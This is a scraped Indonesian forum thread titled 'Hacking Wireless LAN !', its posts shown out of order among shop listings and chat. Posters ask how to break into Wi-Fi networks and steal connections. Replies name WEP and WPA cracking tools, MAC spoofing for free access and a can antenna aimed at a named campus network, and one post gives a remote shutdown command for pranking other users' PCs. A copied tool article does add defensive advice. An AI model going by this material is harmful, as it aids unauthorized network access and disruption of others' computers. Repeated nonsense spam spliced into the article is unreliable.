Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng

atau kalo mau iseng sebentar coba nigh pake rumus ini

Quote
cari taw host name si computer tujuan.. pake angry scan juga bisa.
habis itu ketik deh di command prompt misalnya :
c:/shutdown -s -f -m \\abcd -t 20
habis tu dalam 20 detik, computer client akan shutdown.. keke... :'(

« Last Edit: April 13, 2007, 12:55:48 PM by arbangun » Logged

--------------------------------------------------------------------------------
E2140 @3,2 GHz|MOBO Biostar 945G Micro 775SE Ext|A-Data 2x1Gb 800 PC6400|DVD RW
LiteOn|HIS X700Pro IceQ 256/128MB PCIe|LG LCD monitor 21"
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

arwan
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:June 11, 2007, 11:16:42 PM


Posts: 11
HY$4.00 credits

mufti-
agung
View Inventory
Send Money to arwan

never ending learning

Re: Hacking Wireless LAN !


« Reply #13 on: April 14, 2007, 04:22:42 AM »

--------------------------------------------------------------------------------
lho mas kalo remote system komputer korban nya ga diaktifin kan ga bisa di shutdown korbannya
dengan perintah C:\shutdown .... cmiiw
yup,ethereal berfungsi membaca (baca:capture) pesan atau data yang mengalir pada jaringan,
sehingga aliran data yang aktif bisa terlihat, apa saja yang dibuka, data apa yang dikirimkan apakah
email,friendster atau semacamnya,tapi tampaknya belum bisa untuk data yang melewati https atau
secure socket layer, betulkan bila saya salah

« Last Edit: April 14, 2007, 04:54:26 AM by arwan » Logged

arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 2
Offline

Last Login:October 19, 2009, 02:03:55 PM


Posts: 130
HY$40.00 credits

View Inventory
Send Money to arbangun

aRB'S Coorp

Re: Hacking Wireless LAN !


« Reply #14 on: April 16, 2007, 04:13:39 PM »

--------------------------------------------------------------------------------
SELENGKAPNYA DARI TAMBAHAN KEMAREN.....BIAR PINTER PAKE BHS. ENGGRIS
YA...

Wireless Hacking Tools

Anyone interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities
will need a good set of base tools with which to work. Fortunately, there are an abundance of free
tools available on the Internet. This list is not meant to be comprehensive in nature but rather to
provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being
broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login

You are not allowed to view links.


Register or Login
kISMET[url]http://www.kismetwireless.net/Kismet
[/url] – One of the key functional elements missing from NetStumbler is the ability to display
Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you
should realize that Access Points are routinely broadcasting this info; it just isn’t being
read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very
critical in finding wireless networks.

You are not allowed to view images.


Please register or login

Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
CowPattyCowPatty
– This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for
home Wireless Security. This program simply tries a bunch of different options from a dictionary
file to see if one ends up matching what is defined as the Pre-Shared Key.

You are not allowed to view images.

This little boy kept


mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage

kaskus
mufti-
agus
This little boy kept mngikuti great wisdom then continue to follow yadi marsudi leksub nanan mufti
abdul where children want to take glasses from which anyone who had haris iksan mugiroh Aminah
wanted to take this kids glasses continue to follow their incredible great haris dian iksan solikin
ahmadi Nunus nuk andi extraordinary isang these children to follow their great leader of
exceptional courage

mufti-
agus
Please register or login

You are not allowed to view links.


Register or Login
ASLeapASLeap
– If a network is using LEAP, this tool can be used to gather the authentication data that is being
passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the
authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

You are not allowed to view images.


Please register or login

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.

Ethereal – While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

You are not allowed to view images.


Please register or login

You are not allowed to view images.


Please register or login

The aforementioned utilities, or similar ones, will be necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.

NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.

Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure
your WLAN is protected by using advanced Authentication and Encryption

Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).

Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of residing in a dictionary file that would be used to try and guess your key and/or would
take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to
protect the authentication and limit the amount of incorrect guesses that would take place before the
account is locked-out. If using certificate-like functionality, it could also validate the remote system
trying to gain access to the WLAN and not allow a rogue system access.
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage
This little boy kept
mngikuti great
wisdom then
continue to follow
yadi marsudi leksub
nanan mufti abdul
where children want
to take glasses from
which anyone who
had haris iksan
mugiroh Aminah
wanted to take this
kids glasses continue
to follow their
incredible great haris
dian iksan solikin
ahmadi Nunus nuk
andi extraordinary
isang these children
to follow their great
leader of exceptional
courage

ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.

Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

Logged

jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #15 on: April 16, 2007, 10:42:34 PM »

--------------------------------------------------------------------------------
Ato pke cara fuzzing
Yg ini lebih santai, lebih "sopan"..
Yg jelas gak cmn berguna buat WLAN doang..

info lengkap : You are not allowed to view links.


Register or Login

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #16 on: April 18, 2007, 04:04:48 PM »

--------------------------------------------------------------------------------
kalo yang MAC adress, bukannya ada tuh software buat ganti MAC adress??
ada yang pernah coba blom?kan enak tu kalo bisa diganti, bisa berjam-jam akses gratis....hehee

Quote from: silverx on March 17, 2007, 11:41:56 AM


tools ini bisa sangant berguna untuk browsing sema yang masuk sebuah jaringan, Cain And Abel
cari lewat google aj.... pasti dapat, install dan jalankan, disitu anda bisa membuka kompi-kompi
yang adapada jaringan, meskipun worgroupnya berbeda...........................
aku bingung buat antena yang ada tutorinya diatas, konek ke PCnya ake port apaan??? pake serial?
ato pake USB?? kan ditutorial cuman antenanya doang!!!!!!!!!!!1

kalo ndak salah, dulu saya juga pernah mbaca artikel sejenis. ya kabelnya kan diikat ke antena
WLAN. gak tau deh, kalo WLAN yang gak pake antena bisa apa ndak.jadi bukan pake usb,
serial.kalo ndak salah kan diameter kalengnya juga harus disesuaikan to?

Logged

Panji
[Here To Help]
[ SupeR ADMIN ]
Trade Count: (2)
[ HYPER ]

Posting Quality: 72
Offline

Last Login:Today at 01:44:28 AM


Posts: 2515
HY$9654.00 credits

View Inventory
Send Money to Panji

Everything (better/worse) start from '1'

Re: Hacking Wireless LAN !


« Reply #17 on: April 18, 2007, 05:40:04 PM »

--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

Logged

--------------------------------------------------------------------------------
just trying to serve You...
You are not allowed to view images.
Please register or login
work as hard as U can.. and .. be as simple as U can, to be part of Others!
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #18 on: April 19, 2007, 03:19:49 PM »

--------------------------------------------------------------------------------
WEP Crack bisa anda baca di HyperMedia Magazine edisi 2.

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #19 on: April 20, 2007, 11:48:18 AM »

--------------------------------------------------------------------------------
bro semua, mo nanya nih, kalo lewat cain and abel dah dapet ip adress, port, ama SSID, trus gimana
biar bisa nge-remote komputer tujuan??

Logged

aghya
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 0
Offline

Last Login:June 14, 2008, 09:49:04 PM


Posts: 109
HY$99.00 credits

View Inventory
Send Money to aghya

Re: Hacking Wireless LAN !


« Reply #20 on: June 23, 2007, 07:53:36 PM »

--------------------------------------------------------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

Wah..bagus itu.. aku tunggu ...edisi 7 tanggal terbitnya kapan?

Logged

--------------------------------------------------------------------------------
Venice 3000+ @2600 (daily)..so far
DFI LP UT NF4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa Geforce 6600 GT
Samsung SATA 80
EXtreme 500

inou
nubi all the time... :D
[ Community Member ]
Trade Count: (2)
[ EXTREME ]

Posting Quality: 1
Offline

Last Login:July 06, 2009, 03:57:59 AM


Posts: 563
HY$82.00 credits

View Inventory
Send Money to inou
.: Lets Fill The World With Smile :.

Re: Hacking Wireless LAN !


« Reply #21 on: November 20, 2007, 04:08:46 PM »

--------------------------------------------------------------------------------
halow sadayana,ada yg punya AirPcap yg full ndak?bagi donk

Logged

--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

OFFICIAL TEAM:
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or loginYou are not allowed to view images.
Please register or login

@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]

Posting Quality: -11


Offline

Last Login:January 01, 2010, 12:07:33 PM

Posts: 724 solopos


HY$287.00 credits

View Inventory
Send Money to @5ph@lt

i'm sick of........


Re: Hacking Wireless LAN !
« Reply #22 on: November 21, 2007, 02:50:19 PM »

--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

koq ga ada ya?

Logged

--------------------------------------------------------------------------------
Sempron LE1150 I Abit NF-M2S I Elixir DDR2 667 1Gx2 I WDC 40GB I Seagate 120GB I BenQ
DW2000 I Simbokde 500W PPFC I Thermaltake iFlash 120mm I Compaq S510 15"
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

You are not allowed to view links.


Register or Login

1b3l_jubel
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:September 29, 2008, 03:49:00 PM


Posts: 11
HY$22.00 credits

View Inventory
Send Money to 1b3l_jubel

Re: Hacking Wireless LAN !


« Reply #23 on: July 31, 2008, 08:31:10 PM »

--------------------------------------------------------------------------------
tak coba dah.......

Logged
@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]

Posting Quality: -11


Offline

Last Login:January 01, 2010, 12:07:33 PM


Posts: 724
HY$287.00 credits

View Inventory
Send Money to @5ph@lt

i'm sick of........

Re: Hacking Wireless LAN !


« Reply #24 on: July 31, 2008, 08:43:51 PM »

--------------------------------------------------------------------------------
hyem ga jadi keluarin distro ya?

Logged

Pages: [1] Go Up Print

GoogleTagged: netstat socket windows abit merubah wireshark kampus source enkripsi address
online hak org clien kita apa coding tool netview sofware

« previous next »
Jump to: Please select a destination: ----------------------------- == T H E - C O R E == [OFFICIAL
BOARD] ----------------------------- => Official FAQ, Rules, & Forum Guide => Official Event =>
Official Folding/Grid Team [Hyper-GRID] => Official Merchandise => REVIEW ===> Mainboard
Review ===> Memory Review ===> Display Card Review ===> CPU Review ===> Pheriperal
Review ===> Software Review ===> Games Review => News & Live Chat Discuss ! ===>
Hardware News & Articles ===> Software News & Articles ===> Games News & Articles =>
Online Store & Pricelist (JUST ENABLED ;) ) ===> Intel System ===> AMD System ===> |
HYEM PURWOREJO | ===> | HYEM PALEMBANG | ----------------------------- == HYPER
X-3ME [ADVANCED & SPECIALIST] == |only in English| ----------------------------- => =
WORLD RECORD ADICT = => =| X-3ME Suicide Overclocking Championship |= ===> SuperPi
Team ===> Sisoftsandra Team ===> PC Mark Team ===> 3DMark Team ===> Aquamark Team
===> Mainboard Moding ----------------------------- == H A R D W A R E==
----------------------------- => Basic System Troubleshooting, PC System & Overclocking Guide =>
PC Modding => Processor ===> AMD ===> INTEL => Mainboard ===> Abit => Memory ===>
ADATA => Power Supply ===> FSP => Display Card ===> POV => Optical & Storages =>
Cooling => Sound & Speaker Devices => Pheriperal & Network => Notebook & PDA
----------------------------- == S O F T W A R E== ----------------------------- => Games ===> Games
F.A.Q. ===> Game Cheat & Trainer ===> Multiplayer Game => Operating System ===> Windows
===> Linux ===> Macintosh => Programing => Security => Audio Freak => Webmastering => 2D
Designer and Animation [FOTO-VIDEO] => 3D Modelling and Animation => Other Importance
Software ===> BIOS & ROM ===> Driver ===> Overclocking Tools ----------------------------- ==
ADD-ON BOARD == ----------------------------- => HOBBY ===> Angkringan Ruwet x2 ===>
Angkringan Ngakak

Permissions

You can't post new topics.


You can't post replies.
You can't post attachments.
You can't modify your posts.

--------------------------------------------------------------------------------
BBCode Enabled
Smilies Enabled
[img] Enabled
HTML Enabled

TinyPortal v.1.0.6 beta 2 © Bloc


Powered by SMF 1.1.10 | SMF © 2006-2009, Simple Machines LLC
Theme by |Panji|
MySQL | PHP | XHTML | CSS
Page created in 0.868 seconds with 62 queries. (Pretty URLs adds 0.097s, 1q)
Loading...Loading...

Home Forum Help Arcade Calendar Shop LIVE CHAT GoogleTagged Login Register
button

Masukan Untuk Pejabat-pejabat Forum HYPERMEDIA


You are not allowed to view links.
Register or Login
click here and post

The Unordinary
Masukkan istilah pencarian Anda
Web hyem.org
Kirim formulir pencarian

You are not allowed to view images.


Please register or login

Welcome, Guest. Please login or register.


March 06, 2010, 05:55:13 AM
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length
Pricelist Update !!
PRICELIST UPDATE => You are not allowed to view links.
Register or Login (last update 2009 Okt 21)

HYPER Xitro Dragon-3D Design AP1


Phenom II X4 From X2 Deneb, DFI LP DK 790FXB-M2RS,Palit HD 4850, OCZ Gold Edition 2 x
1GB, WDC 500 GB 16 MB, ATX + Enhance 400W True
PROMO : Rp. 4.978.765,-

HYPER Xitro Dragon-Fire AP1


KUMA Athlon X2 7750+, abit AX78 AMD 770 / SB600 CrossFire OTES Dragon Platform, Saphire
HD4830/HD4770, OCZ Gold Ed 2x2G 8500 CL5, WDC 320 GB 16 MB, FOXCONN Case+PSU
PROMO : Rp. 4.498.765,-
BEST SELLER...!!!!

HYPER XITRO Designer AP2


Core2Quad Q8400,DFI LP Junior GF9400-T2RS Hybrid SLI, OCZ Fatality Edition 2X2G, WDC
500 GB 16 MB, FOXCONN Case+PSU True (Graph DESIGNER PC)
PROMO : Rp. 4.454.545,-

HYPER Xitro TOXIC-Dragon ACF


Phenom II X4 from 550BE, DFI LP BI 785G-M35 CrossFireX Dragon Platform, Palit HD4830
256bit, DDR3 OCZ Fatality Edition 2X2G, WDC 500 GB, Enhance 400W True + (FREE
VENDETA II for fist buyer everyday)
PROMO : Rp. 4.976.543,-

HYPER Xitro Epix-Dragon


Athlon II X2 @ 3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super
512MB 128bit, DDR2 2X1G, WDC 160GB 16 MB, ATX 400W
PROMO : Rp. 2.525.252,-
| LCD 15.6"+Key+Mouse = Rp. 950rb | LCD 19"+Key+Laser Mouse = Rp.1.300rb | LCD
16"+Key+Mouse= Rp. 990rb |

PALIT HD4870
PALIT HD4870 Sonic Dual Edition DDR5, 512MB, 256bit 775/4000 Dual OC Speed (dalam
beberapa hal grafis 256bit ini masih lbh unggul dr 5770 128bit, apalagi kalo kita lihat dari
price/performancenya)
PROMO : $150

PALIT HD4850
PALIT HD4830 DDR3, 512MB, 256bit, Core:575/ Mem:1800Mhz + HDMI

Adik termuda dari keluarga RV770, Still be the Price/Performance KING!


PROMO : $90

PALIT HD3850 Super DDR3


RV 670, 256 MB DDR3, 256bit, 670MHZ, 1660MHZ, 319

Dgn DDR3, Kartu High-end legendaris ini adalah High-end display Card dibawah $100, khusus
bagi yg suka OC.. This babe is the Most Value King!
PROMO:$78, 512M:$65

ALL AVAILAVBE

Chat Now!

[more]
Last 20 Shouts:
--------------------------------------------------------------------------------

Panji
Today at 01:44:28 AM
Selamat buat Hendy hyem.. ganyangka lu menang bro..
an35
Today at 12:50:18 AM
ayo kita kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
sepi mas dab...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do yang"an :p
B.U.G.S
Yesterday at 05:05:04 PM
@Tito Haga
kan iso nge-move tp ga nggo redirection, dadi ga metu MOVED.. MOVED.. ngunu marai MOMED
wae.. wakakaka..
coolwin
Yesterday at 04:58:26 PM
CEK UPDATE BEST KILL hari ini CF!!!!! SAYA DI PERINGKAT 2 WAKAKAKAKAKA
Tito Haga
Yesterday at 02:51:11 PM
@BUGS
hahahaha...sori2..bar tangi turu ngemoved ya ngono kui...haha
donkey
Yesterday at 01:57:41 PM
wakakakaka....
blackshield™
Yesterday at 11:54:06 AM
cilukkkkkkkk
baaaaaaa...
B.U.G.S
Yesterday at 10:39:35 AM
buset, isine kok ming moved kabeh kie..? nek nge-move topik lawas mending ga usah dikei
redirection kang..
Tito Haga
Yesterday at 08:26:27 AM
wakakakakka...senasib berati
sadnux
Yesterday at 08:20:42 AM
bukan soal bersih2 nya, tp itu lho tulisan yg di sign yg soal kuliah
ortu sering ngomong kek gitu kl pas marahin ane T_T
Tito Haga
Yesterday at 08:13:04 AM
Hahahahaha...maap2 ya...kesalahan teknis tadi le bersih2...jadi ngemovednya salah kamr jugah ::
sadnux
Yesterday at 08:09:47 AM
pagi yg indah..tp langsung ketendang sama signaturenya pak dito
wakakakak
Tito Haga
Yesterday at 07:56:09 AM
pagi kang
sadnux
Yesterday at 07:47:53 AM
met pagi semua
Tito Haga
Yesterday at 06:34:29 AM
weh...kang panji onlen
Panji
Yesterday at 06:13:51 AM
miss u all...
Tito Haga
Yesterday at 05:30:56 AM
Ndalu geng

Show last 200

Polling
Lates Post
Beli fingerboard dimana y... by vheebhee [Today at 03:46:23 AM]
Mo Tanya Lagi Niy.. Boleh... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
TOLONG PENJELASAN MENGENA... by botaxalim [Today at 01:54:06 AM]
Update 5 Maret 2010 Cross... by botaxalim [Today at 01:36:16 AM]
[ASK] Membangun Jaringan by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot... by Hazzan [Today at 12:24:06 AM]
guitar hero pc maen pake ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Karya 3D Buatan An... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie unru... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] Intel 915GAV Tit 3x... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 AM]
Sesuaikan DDR3 anda...!!! by masYogo [Yesterday at 05:18:00 AM]
[review] HaPe Modem "smar... by frozr_man [Yesterday at 05:08:18 AM]
AMD VS INTEL < FIGHT ! > by didit_catro' [Yesterday at 04:15:54 AM]
[Ask About] Garansi proci... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] Cara mbungkam Fan b... by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Adu Kreativitas Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10884
Latest: Ricko
Stats
Total Posts: 102876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP

http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org Hot NEWS


The Unordinary Community > Forum > == S O F T W A R E== > Security (Moderator: Light) >
Hacking Wireless LAN !
Pages: [1] Go Down « previous next »
Print

Author Topic: Hacking Wireless LAN ! (Read 6005 times)

berang_berang
Trade Count: (0)
[ POWERED ]

Posting Quality: 0
Offline

Last Login:May 24, 2006, 10:28:54 AM


Posts: 57
HY$0.00 credits

View Inventory
Send Money to berang_berang
Topic starter

Hacking Wireless LAN !


« on: March 09, 2006, 01:07:46 PM »

--------------------------------------------------------------------------------
Kalo kita mau hack w.LAN tools2 standard apa yg kita butuhin, dan caranya gmana ?

Gmana cara masuk dan gmana cara bobolnya ?

Trus kalo pake linux tools yg disarankan apa ? kalo windows apa ?
Kalo mau nyolong koneksi internet gmana ?

Logged

bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #1 on: March 13, 2006, 01:02:12 PM »

--------------------------------------------------------------------------------
netstumbler & kismet buat nyari AP atau SSID yg aktif & airsnort buat ngecrack passwordnya...
manual instalasinya & tutorialnya googling aja. Kalo berhasil jgn lupa share passwordnya...........

Logged
The Unordinary Community Re: Hacking Wireless LAN !
« Reply #1: March 13, 2006, 01:02:12 PM »

--------------------------------------------------------------------------------

Logged

RooTrick
[ Community Member ]
Trade Count: (0)
[ POWERED ]

Posting Quality: 0
Offline

Last Login:September 10, 2009, 11:04:13 AM


Posts: 93
HY$36.00 credits

View Inventory
Send Money to RooTrick

Re: Hacking Wireless LAN !


« Reply #2 on: March 19, 2006, 08:13:19 PM »

--------------------------------------------------------------------------------
tuh download dmn om?
trus kalo uda dapet source code na bikin aplikasi na gmn???
thx bgt...
:mrgreen:

Logged

--------------------------------------------------------------------------------
Let the world revolves around me...

densinyo
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 0
Offline
Last Login:February 28, 2010, 12:54:59 AM
Posts: 133
HY$353.00 credits

View Inventory
Send Money to densinyo

-=-peduli lingkungan mulai dari diri sendiri-=-

Re: Hacking Wireless LAN !


« Reply #3 on: March 20, 2006, 08:15:01 PM »

--------------------------------------------------------------------------------
DL dmn tuh...boleh dong minta linknya...

Logged

--------------------------------------------------------------------------------
T-Force 550 ! Athlon64 X2 4000+ ! Adata 2gb ! Acbel 400w ! WDC 500gb ! DVD RW Pioneer !
DVD Lite-On ! A4Tech
-=-peduli lingkungan mulai dari diri sendiri-=-
081-5612-7812

You are not allowed to view links.


Register or Login

You are not allowed to view images.


Please register or login
The Unordinary Community Re: Hacking Wireless LAN !
« Reply #3: March 20, 2006, 08:15:01 PM »

--------------------------------------------------------------------------------

Logged

bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #4 on: March 21, 2006, 03:09:47 PM »

--------------------------------------------------------------------------------
Aku lg ada proyek nih,bikin antena kaleng buat nembak WiFinya YKPN, ada yg pernah punya
pengalaman ga bkin antena kaleng?
Cari alat n bahannya ada yg tau ga?
Ini ada sdikit tutorialnya kalo pd berminat :
You are not allowed to view links.
Register or Login

Logged

MAS
[OprekPC]
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline

Last Login:April 19, 2008, 06:18:17 PM


Posts: 57
HY$221.00 credits

View Inventory
Send Money to MAS

Re: Hacking Wireless LAN !


« Reply #5 on: August 16, 2006, 02:28:36 AM »

--------------------------------------------------------------------------------
ikuti ini aja deh... You are not allowed to view links.
Register or Login sdh terlalu tua Linux nya (sbb Auditor sdh susah carinya n dah diganti Backtrack)
tp yakin deh,klo anda mampu mengimplementasikan,wuiiih mudah banged.

satu hal lagi....pemilihan chipset wifi jg jd pertimbangan.bisa diliat disini

You are not allowed to view links.


Register or Login

klo utk windows,selain netstumbler pake aja WDRIVER dan AirSnort.jamin isa (klo cuman make
WEP) tp klo targetnya dah make MAC auth ya nyerah deh mas...hehehehe,lum ada yg isa

Logged

--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Modifikasi - Tweak - Overclock PC

You are not allowed to view links.


Register or Login
WarungPlus

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #6 on: December 13, 2006, 01:58:02 PM »

--------------------------------------------------------------------------------
gini bro, aku kan di kampus pake fasilitas internet.tp pake via pc yang terhubung via LAN. trus
waktu ta' liat ternyata dalam jaringan itu ada juga laptop2 yang terkoneksi via wifi. aku liatnya pake
cmd, trus ta' ketik "net view" keluar tu laptop2nya. bisa ta' hack gak dari pc yang aku pake?
thanks ya...(just curious, don't wanna harm everybody)

Logged

psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline

Last Login:January 09, 2007, 09:24:31 AM


Posts: 2
HY$0.00 credits

View Inventory
Send Money to psyCHo_L061c

Re: Hacking Wireless LAN !


« Reply #7 on: January 08, 2007, 04:52:37 PM »

--------------------------------------------------------------------------------
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline
Last Login:September 20, 2008, 02:39:26 PM
Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #8 on: January 26, 2007, 08:04:29 PM »

--------------------------------------------------------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie

wah, mbok saya diajarin mas...lha kan saya masih dibawahnya newbie
hehee

Logged

The Unordinary Community Re: Hacking Wireless LAN !


« Reply #8: January 26, 2007, 08:04:29 PM »

--------------------------------------------------------------------------------

Order : hyem_toko

Logged

silverx
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 1
Offline

Last Login:June 18, 2008, 02:50:14 PM


Posts: 121
HY$120.00 credits

View Inventory
Send Money to silverx

Nikmatilah Hidup Ini......

Re: Hacking Wireless LAN !


« Reply #9 on: March 17, 2007, 11:41:56 AM »

--------------------------------------------------------------------------------
